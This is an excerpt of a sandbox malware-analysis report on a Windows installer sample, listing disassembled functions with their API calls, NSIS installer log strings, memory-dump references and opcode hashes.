                                                                                                                                                                                                                                                                                                        • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                                        • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                                                                                                                                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                                                        • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                                                        • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                                                        • String ID: F
                                                                                                                                                                                                                                                                                                        • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                                                        • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                                        • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                                                                                                                                        Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                                                        • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                                                        • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                                                        • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                                                        • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                                                        • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                                                        • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                                                        • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                                                        • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                                                        • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                                                        • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                                                                                                                                        Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                                                        • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                                        • API String ID: 3734993849-3206598305
                                                                                                                                                                                                                                                                                                        • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                                        • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                                                                                                                                                        Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                                                        • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                                                        • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                                                        • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                                                        • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                                                                                                                                                        Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424170,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424170,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424170,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                                                        • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                                                        • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                                                        • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                        • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                                                                                                                                        • API String ID: 1033533793-4193110038
                                                                                                                                                                                                                                                                                                        • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                                        • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                                                                                                                                                        Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                                                        • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                                                        • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                                                        • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                                        • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                                                                                                                                        Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424170,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424170,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424170,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                                                        • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                                                        • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                        • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                                                        • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                                                        • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                                        • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                                                                                                                                                        Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
